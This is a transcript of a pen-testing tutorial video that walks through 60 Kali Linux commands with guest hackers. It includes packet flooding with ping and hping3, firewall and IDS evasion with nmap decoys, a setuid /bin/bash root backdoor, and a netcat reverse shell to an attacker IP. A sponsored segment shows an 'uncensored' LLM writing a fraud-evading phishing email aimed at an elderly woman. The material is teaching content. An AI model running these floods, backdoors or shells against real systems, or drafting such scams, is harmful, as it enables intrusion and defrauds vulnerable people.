Here are the top 60 hacking commands you need to know. I also brought in a few experts, so get your coffee ready. If you want to try these commands right now, I've got a free Kali Linux sandbox in the description. Just click that link and right here in your browser. Boom, hacking environment. Make sure you read the instructions. You got 2 hosts to hack with. Also, all the commands in this video are in the description below. We even created this beautiful top hacking commands cheat sheet. You gotta have this. The humble ping command. We ping a host to see if it's up, and if it's up, we'll hack it. But right now we're sending a 64-byte packet. What do you say we send something bigger? To test firewall capabilities, we can type in ping-s and specify the size of our packet, testing the capabilities of a firewall. Or we can get even crazier. We'll still send our large packet, ping-s 1300, but then we'll use the switch -f to absolutely obliterate this host, flood a ton of packets. And actually, before we do that, I want to see this happen. I'll start another terminal and give you a bonus command here. This tool is called iftop. I'll install it with apt install iftop, and then type in iftop to run it. Now, let's flood. Look at that! Whew, that's a lot of data. Control-C to stop that. Same for iftop. Goodbye. And actually, let's keep iftop up because we're not done with ping yet. I know you didn't realize there's so much to ping. And this tool is kind of crazy. It's called hping3. We'll install it with apt install hping3. And we can do fun things like flooding packets on a specific port. For example, port 80. hping3-s for a TCP packet. -v for verbose mode gives us more info. --flood to make it rain. And finally, the host. Here we go. Man, look at that. And we're hitting port 80. Great for testing web servers. We can also use hping3 for a fancy trace route. hping3-traceroute -v, and then here's what's cool. We'll do -1 for ICMP packets, and then our host networkchuck.coffee. But sometimes firewalls block ICMP with traceroute. Removing -1, we can instead do -p, 80, and -s, doing traceroute on port 80, which is web traffic, HTTP, using, of course, TCP. And pick your port, maybe 443. Maybe 53, use the DNS port, specifying --UDP traffic. Or with TCP traffic, we can add the -A switch, setting the ACK flag, ACK, and then change our base port with --base port. 1337, all amazing options to help us evade firewall rules. Now I bet you thought we were done with ping, but we're not. You can tunnel TCP packets over ICMP echo reply and request packets. What? Check this out. It happens with the tool called ptunnel. apt install ptunnel. On the target side, we'll simply run ptunnel. On the attacker side, we'll run ptunnel, -p for proxy address, that'll be our target, -lp to specify our local port, we'll do 8000, -da for our destination address, it'll also be our target, and we'll do -dp for our destination port, and because I'm gonna try SSH, I'll do port 22. Ready, set, tunnel. Now to watch this happen in real time, I'm gonna show you a new command. tcpdump will help us to capture and visualize these packets in real time. We'll use apt install tcpdump to install it, and then we'll run tcpdump -i for interface, and we'll say any, and we're only looking for ICMP traffic, so we'll type in ICMP. Now watch this. I'll launch a new terminal, and I'm gonna go over this tunnel using ICMP packets. Oh my gosh, check this out. SSH, -p for port, specifying 8000, and I'll do username NetworkChuck, that's my username at the other host, at localhost, pointing it right here on this computer, this server. Ready, set, go. Do you see it happening? Oh my stinking gosh. Literally sending SSH traffic over ICMP echo reply echo request. That's magic. Who am I? IP address. Yep, I'm somewhere else. That's so cool. And Control-C to close those tunnels on both sides. And this is great for evading firewalls that might block that type of traffic. Here's a quick command from TomNomNom. Nom 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 nom.
I'm TomNomNom, and this is a trick I use all the time. If you're running a command and you don't know what you want to do with the output yet, pipe it to vim dash. That'll open the output of the command in Vim, and then you can either manually edit it, or you can use :bang to run it back through any command you want. Run it through sort to put things in order, or grep -v to remove lines you don't want. And then as a bonus, if you have a file name under your cursor, hit G, then F to open that file in a new buffer.
Nmap will scan a network, helping us to discover hosts that we can hack. Here's some fun ways to use it. First, make sure you install it. apt install nmap. We can scan an entire network for quick mapping with nmap-sn and then our target network. Hey, it found 11 hosts. The switch lowercase s capital V will do service discovery on a target. Works like a charm. Use the capital O switch for OS detection. Well, hold up, we tried, but it's blocking ping probes. Let's try -pn to not do the probe. We'll add that to our command, -P lowercase n, bam, we got it. It's a Windows PC. We can use a lowercase s capital L switch to do quick host name scanning on a network. Nmap scripts unlock a whole new world. We can scan for vulnerabilities on a host with --script vuln, and then our target host or network. We can use the malware script to scan for known malware. With the capital A switch, we can scan for pretty much everything. Take a little coffee break, it'll take a while. This one switch does OS detection, version detection, some default script scanning from Nmap, and a trace route. That's a lot of info. That's awesome. If we use the lowercase f switch, it'll fragment our packets and make it harder for us to be detected while we're scanning. We can also avoid detection by changing our source port. Using the source port switch, we can just say, hey, I'm DNS, don't mind me. And if you really want to be tricky with Nmap, you can scan with decoys. Check this out. Nmap, -D for decoys, and then specify RND, all capital, colon, let's say 10. What that will do is generate 10 random IP addresses, random decoys that you're scanning from, so they can't find you. We'll put our host in and then bam, scanning from 10 different IP addresses. Now Nmap is cool, but what if you have a lot to scan, like networks upon networks, and you want to scan them fast? That's where Masscan comes in. We'll install Masscan with apt install Masscan. Masscan is similar to Nmap in that we can specify ports to scan for, specify a network, but then we can specify our rate, and go super fast. Just like that. Or if we have no idea what networks we're dealing with, we can scan everything, like the entire 10.subnet range, and we'll do a rate of 10,000. Now it is fast, but you still might want to take a coffee break. Just saying. We'll just Control-C that. We can also use the randomize host switch to change the order in which we scan our host or networks, helping us stay a bit more hidden. Or we can quickly find servers foolishly running telnet on a network. Super insecure, but we can find that out right now, simply by specifying port 23 and scanning an entire network fast. Got one. Now here's John Hammond with something a bit silly, but I love it though.
You normally just enter ls on the command line to list stuff in the current directory. Well, did you know that there is actually an SL command? Like if you were typing really fast, or you accidentally made a mistake, or you had a typo when you meant to type ls and you accidentally typed SL, this is the steam locomotive. And it is a train that is displayed on your computer screen, on the command line, on the terminal. And look, you can't get out of this. You can't type anything, you can't do anything, you just have to wait for the whole train to drive by. Now the next fun hacking command that I want to show you is actually part of the dev piece of the file system. I don't know if you're familiar, but there is a /dev/urandom file. And that is like a device to list out pseudo-random data just coming from your computer, right? Hey, you have a stream, a constant stream of randomness. And this looks hysterical. It is just gibberish. Nonsense, zeros and ones, and all the data up to 255 ASCII characters, printable, non-printable, and it just looks like absolute chaos. You can Control-C out of this, but sometimes it might break the terminal and you can't actually continue to interact with the shell. So it's something that you might be able to do as a troll, as a meme, right? So what if we actually set an alias for that same ls command? Maybe we could set that to SL if we wanted to run the steam locomotive train again, but we could set that to cat dev urandom. And now anytime someone were to actually enter ls on the command line, thinking that they're gonna list files, it'll just spit up and go crazy with all that random gibberish and nonsense. I think that's kind of fun.
By the way, John Hammond will show us a real hacking command he loves later in the video. The whois command will tell you a ton of stuff about a domain. Install it with apt install whois. Whois Microsoft.com. Fax number, phone number, address. Let's try CIA.gov. Redacted. Should have expected that. Whatweb will tell you what technologies a website is using. Apt install whatweb to install it. And then we'll type in whatweb and our domain. We'll try NetworkChuck.coffee. And while it's scanning, perfect time for a coffee break. It gives you a ton of information, including the fact that it's powered by Shopify right there. Next up, curl from Nahamsec.
My favorite command is actually not using any hacking tools, and it's probably one of the most basic commands used on Linux, and it comes by default on almost any operating system, and that is a curl command. And let me show you really quickly how I use it. The first thing I want to do is usually I just want to do a curl-i. That usually gives you the headers and every response in that header of what it is coming back from the server. So in this case, it's giving us a 302 and it's saying, hey, you are going to get redirected to this exact location. And I like doing curl a lot because I'm hacking a lot of APIs most of the time. And with APIs, I want to just quickly see if an endpoint is accessible or if I can fetch some sort of a data. And a lot of times I'm processing data as a part of my hacking when I do recon. So it makes it a lot easier to do it through curl. And what you want to do for this one, for example, if you want to authenticate, instead of launching your browser and setting this header manually, all you have to do is you can pass a header and set that custom header with its token in there and run it, and it would authenticate you and give you whatever data it is that you're looking for on that API.
Hey, real quick, can I show you something crazy? Check this out. I'm about to run an uncensored version of ChatGPT, or an LLM, which means you can pretty much do whatever you want to do with it. Now, why am I doing this? Well, because Bitdefender just came out with a tool called Scamio. It's a free AI-powered scam detector and prevention service from Bitdefender. Like legit, check this out. I got a text from a scam, I'm pretty sure it is, but do I actually know? Let me go find it. Oh, yep, here's one. Pretty sure this is a scam, but do I know? All I gotta do is copy that sucker and jump into Facebook Messenger. Just one of the places I can chat with Bitdefender Scamio and see if things are scams. So let's try it out. Hey, is this a scam? Again, this is totally free. I'm just chatting with it here in Facebook Messenger. And within seconds, it told me that, hey, it might be kind of suspicious. Don't do anything with it. Okay, that's pretty cool. That didn't fool it. But what if I had this uncensored AI tool try to produce a phishing message? Can we trick it? Let's try it out. I need you to write a very convincing phishing email for an elderly woman named Deborah. The goal is to get her to give me some money. Use the best method you know and write it in a way that will avoid spam and fraud detection. Let me add that, and fraud detection. Snap. Okay, that's pretty good. It even added this at the end. That's awesome. Okay, let's doctor it up just a little bit. We'll remove like the, it's not a real URL thing right there. Let's add like a real looking number like 7650987. And I'll remove the not a real number thing here too. Okay, cool. Our message is ready. Let's test it out. Please tell me if this email is okay. Now, while it's checking that, think about this. Who in your family or in your friend group could benefit from having something like this? I can't tell you how many times I'm getting a text from my grandma or my mom going, hey, is this a scam? Is this fraud? But if they can chat with something that is honestly probably smarter than me and will be up to date with the latest scams. It's actually powered by Bitdefender, the excellent security suite that I've talked about here on this channel a lot. So all the information and knowledge they have is feeding this Scamio free AI-powered tool. Okay, the results are in. The email does seem suspicious. It tells you what tactics it might be using, and it tells you to contact your bank directly. That's perfect. That's what I would tell my grandma, or my mom, or my dad. So seriously, try it out right now. Check the link below, it's free. Just, you can chat with it here on the website, or chat within Messenger. They'll be adding WhatsApp soon, and it'll check lots of things, like you can send it a QR code and go, hey, is this good? You can send it pictures of stuff. This is a crazy powerful and free tool. I love what Bitdefender's doing. So again, definitely check it out, and thank you to Bitdefender for sponsoring this video and making a really awesome free tool available to all of you guys.
Nikto is an open source web server scanner that'll scan websites for any dangerous bad stuff it might have. To install it, we'll do apt install Nikto. And for a basic vulnerability scan, we'll do Nikto-H for our host and specify our host, NetworkChuck.coffee. GoBuster can be used to find directory and files on a web server. We'll install it with apt install gobuster. To enumerate networkchuck.com, we'll do gobuster. We'll type in dir for directories. That's the mode we're gonna be in. We'll type in -u and specify our domain, networkchuck.com. And we'll use the -w to specify our word list. I'll use a default Kali Linux one here, and go. And it's discovering all my directories and files. Now, because GoBuster is written in Go, it's extremely fast subdomain enumeration. Yeah, we can use it for that. But first we'll want to download a word list. To get a ton of word lists right now on your system, we'll use the tool called seclists. apt install seclists. Fair warning, this is pretty big. Lots of word lists. Once it's done downloading, you can find it in user, share, seclist. Lots of stuff in there. Now real quick, if you only want to download one thing, the thing that we care about, there's a command for that. It's called wget. Seclist is also on GitHub, and it's maintained by my friends. What we care about is discovery and DNS. And we'll get Jason Haddock's list here. I'm gonna grab the raw URL. To install wget, apt install wget. Kind of seeing a pattern here, right? Type in wget, paste that URL, W got it. Now getting back to GoBuster, we can enumerate domains. We'll type in GoBuster. Mode will be DNS. We'll specify our domain with -d, networkchuck.com, and then our word list with -w, I'll use Jason Haddock's DNS. ready, set, go. Now that's a pretty big list. And if I were doing a legit pen test, I'd probably let this finish out, but I don't have time for that. I'm not patient enough. Control-C to stop that. I want to show you another way to do subdomain enumeration. This tool is called sublister. You can install it with apt install sublister, just like this, and the E is a 3. And then to run sublister, we'll simply type in sublister, -D to specify our domain, networkchuck.com, and let it go. And it found a lot of stuff. This next one is pretty fun. It's called wpscan. It will scan WordPress sites and help you find all the issues that might be affecting it. Great if you're a WordPress site owner, and great if you're a pen tester. Let's try it out. We can run it in a few ways. The first way, wpscan, we'll do --URL and specify our URL. We'll do chuckkeith.com, my personal website that's not doing anything. And then we'll do --enumerate U. Not you, the letter U. The U stands for users. Let's try it out. That's a lot of information. We can also use the P option for plugins. We can use T for themes, or do something pretty aggressive. We'll do VP, VT, --plugins, -detection. And we'll add aggressive at the end, just to make sure we get our point across. This is a super aggressive vulnerability scan. Let's try it out. Now you may have noticed that all those commands did not output anything fun because you need an API token from wpscan, which you can get for free right now. And then you would run the commands like this, specifying your API token with the --API-token switch. Amass is another tool you can use for subdomain enumeration. Install it with apt install, and to run it, we'll type in amass, type in enum, -D to specify our domain, networkchuck.com, and let it go. This tool might run forever. I don't want to wait for it though. Control-C to stop that, but man, look at all the stuff I found. To do a more passive enumeration, you can do this, amass, enum, and we'll specify -passive, and then our domain. Whereas the other one was a bit more active. I like amass because it does give us options based on what our scope is. And we'll go ahead and stop that. This next command opens up the door to new commands. What does that mean? You'll see, it's a tool called git, which we'll often use when you first start out to interact with GitHub. Let me show you. There's a tool we're about to use called searchsploit. But the way we use this tool is by downloading it from GitHub. And actually, I lied. This is a GitLab repository, but it's pretty much the same thing. You'll use git all the time to install all kinds of stuff. But first we have to install git. apt install git. You probably already have it. And then probably my favorite command is git clone. We're gonna clone a tool onto our computer. And in our case, it will be searchsploit. Let's go. To properly use that command, we'll add a symbolic link. We're not gonna talk about that, just know it's a command below. And then finally we can use the command searchsploit, right? Yeah, it's gonna work. Let's try searching for WordPress plugins. It'll search for exploits that involve WordPress plugins. What about SSH? A ton of exploits pertaining to SSH. Super handy tool. If you want to update the database, searchsploit-u. Crazy powerful tool. Now here's John Hammond with a real hacking command. It's kind of awesome.
Let me get into the real, genuine, ethical hacking and penetration testing, my favorite top hacking command. Here's the thing, when you're on the command line interacting with the shell, you're actually running this program called bash, or the born again shell. Now that lives on the file system in /bin bash. So if I were to actually execute this, it doesn't look like it does anything. I just get the prompt back because I've just invoked and am running a shell or terminal inside my shell. So I could exit out of that and get back to my original prompt, but bin bash actually takes a special argument called tacp, and that will enforce and maintain set UID permissions, which means that the owner of the file, root in this case, the admin absolute controller of the computer, will be able to keep their permissions. But it has to be a set UID binary. So the way that we could do that is to actually chmod or ch modifications, change modifications on the file, and add or plus the S letter for set UID. We'll put that on bin bash, and this will require some root privileges. That means that you need to be the admin to be able to configure this, but what that ultimately does is create a backdoor, or you have a persistence mechanism, a little bit of a foothold, so that at any point, if we configure this with our sudo password, later on down the line, you get access to this machine one more time. Now you can just run bash tacp, and you are root. You control the whole machine because you are the admin user. You set up that backdoor. If you wanted to, you could move into the root directory and you could do anything that you want. Maybe we could echo hello into a please subscribe to NetworkChuck. I'll hit enter on that, and now if I zoom out, let me show you this. ls-tac-la, we can see our file right there. Please subscribe to NetworkChuck. Hey, just owned and controlled by the root user. And we were able to configure that with our backdoor sudo chmod plus s bin bash. That is my favorite top hacking command, because then you've got a backdoor, you've got a persistence mechanism and a way to become root at any point. I hope you enjoyed a couple of those really neat, hey, top hacking commands, but thank you so much, NetworkChuck, for letting me join the party here. This was an absolute blast.
Now, I'm gonna do something bad. I'm gonna do the same command twice. What? No, I know, it's okay. We're gonna talk about tcpdump again. Why? Well, because there's more cool stuff about it and we didn't give it enough time. We'll type in tcpdump, we'll type in -w to send it to a file. We'll just call it capture.pcap. Then -i for our interface, and we'll do Ethernet 0. That's the one I have now. Let me just make sure that's the case. IP address, yes, Ethernet 0. And go. Now we'll generate some traffic. Do something fun that we've already learned, like Nmap with random addresses. Decoys. We'll stop that with Control-C. We can analyze that traffic with this command. tcpdump -r, specify our capture file, which is capture.pcap. Let's take a look. Cool, we can see it. We can also limit the amount of packets we capture with tcpdump and the switch -c for count, and we'll say like 100. That did not take long. Now tcpdump is pretty cool. Great for quick captures, but the real tool you want to use that's crazy powerful is tshark, the command line brother of Wireshark. To install tshark, we'll do apt install tshark. Tshark can do a lot. Let's try a few things. First, we'll type in tshark, and we'll capture one packet, just one. We'll put it in verbose mode with -V. We'll do -c for count, we'll do 1, and then -i Ethernet 0. One packet captured, and then look at all the stuff it shows us. That is so powerful. Networking geeks are just drooling, so yes, I'm drooling. Do you want to see something crazier? Filters. Watch this. tshark, we'll do a -y to apply a display filter, and with a single quote, we'll specify it. We'll do http.request.method space equals and in double quotes get, and then close it out with a single quote. I know it's kind of wordy, but check this out. Let's specify our interface, Ethernet 0, and we're now capturing and only showing get request. How cool is that? Let's generate some. curl academy.networkchuck.com. There's another one. That's so cool. Now, one of the most powerful ways we can use tshark is by analyzing packet captures. So let's do a capture real quick to a file, tshark, and actually no, I'm gonna show you one cool thing. We'll use a command called timeout and put in 15 seconds. And it will time out or stop this packet capture in 15 seconds. That's pretty cool. tshark -i Ethernet 0, and with the -w command, similar to tcpdump, we'll send that to a file. tshark-pcap. Let me try to generate some quick traffic. And done. To display statistics and specifically to follow endpoint connections, use this command. tshark-r will specify our capture, which was tshark.pcap. Then we'll use the switches -qz and specify endpoints, IP. How cool is that? We can also follow a TCP stream with tshark-r, our capture, -qz, and we'll say follow, TCP, and we'll put that in ASCII. So ASCII, we'll do comma, we'll follow the 7th stream. That's pretty cool. Let's try, I don't know, the first stream. First stream's crazy. Let's do the 20th stream, the 100th stream. It's so powerful. We can also simply do custom output of fields based on the capture we're reviewing. Check this out. tshark, do -e ip.source, -e ip.dest, or DST, -e frame.protocols. Notice we're specifying fields. We'll do a -t fields, which is telling it to only output the fields we're specifying, and then finally -r specifying our capture. How cool is that? So powerful. This is my new favorite tool, tmux, a terminal multiplexer. Install tmux with apt install tmux, and then simply type in tmux. We suddenly have a new terminal that we can do stuff in, like pinging academy.networkchuck.com. Leave that there, hit Control B and then D on your keyboard. You're detached from it, and then with tmux A, get right back to it. How powerful is that? I'll stop this, type in exit to close that out. We can create multiple sessions and name them. So tmux new -s and name it Bob. Here's Bob. We'll ping something here. Detach from that, create another session, Susie. And now if I type in tmux ls, I've got 2 sessions, and I can reattach to either of them. tmux a -t to specify my target, we'll say Susie. Jumping right back in there. I can hit Control B and then W to quickly jump between my various tmux sessions. And I can leave, go to another computer, jump back in here, and connect to any one of these sessions. If you want to learn more, I did a whole video on tmux right up here. SSH, we use it all the time to remote into our systems. So for example, this Ubuntu guy. To jump into him, I'll use SSH. SSH, NetworkChuck at his IP address. Already cool, but it can do more. Instead of logging in, I can actually just run a command via SSH on another system. With SSH, NetworkChuck at my server, and then right after that, specify the command I want to run. So in single quotes, I can say, who am I? Bam. Or IP address. Crazy powerful. Let's get crazier. You can actually make it a SOCKS proxy. What? Watch this. Before I create the tunnel, let me demonstrate my location right now. What's my IP address? I'm in Dallas, Texas, as you can see right here. But if I use this crazy SSH command, I'll create a proxy and tunnel myself somewhere else. SSH -D, which is telling it to create a SOCKS proxy, and I'll say port 1337. We'll do a -C for compression, -Q for quiet mode, and -N to not execute any commands. And finally, our server information, root at, and this will be a server in Japan. Put our password in. Now we're gonna launch Chromium using that proxy, our SOCKS 5, the local host. Ready, set, go. Chromium's launched. Now let's see where we are. It already feels a bit different, and given that I'm having a hard time figuring out where to go, I'm definitely in Osaka, Japan. Super cool, right? Netcat, our go-to for reverse shells. To install Netcat, we'll do apt install netcat-traditional. To verify, just type in nc-h. And with Netcat installed on both your attacking computer and your target computer, let's do a reverse shell. On the attacker, all we gotta do is wait. Wait for the shell. Type in nc-lvp and the port you're waiting on, 1337. We're waiting. Because on a reverse shell, the target reaches out to us. On the target side, we'll type in nc for netcat. We'll do a -e and specify the shell we want to have access to. So we'll do /bin/sh, specify our attacker IP, which is us, and the port 1337 that the attacker is listening on. And then we'll hit enter. Did something happen? It sure stinking did. Check it out. I'm on the other computer. I've got a reverse shell. Now you can also do a fun thing where you just set up a simple chat server with Netcat. Why? I don't know, but you can do it. You should try it, it's fun. On one side, you type in nc-lvp, set a port. On the other side, type in nc-v, the IP address of the other computer, and the port. So now I can say, hey, and I get hey on the other side. What are you thinking about? The end of this video. Me too. I'll catch you guys next time. For real though. Bye.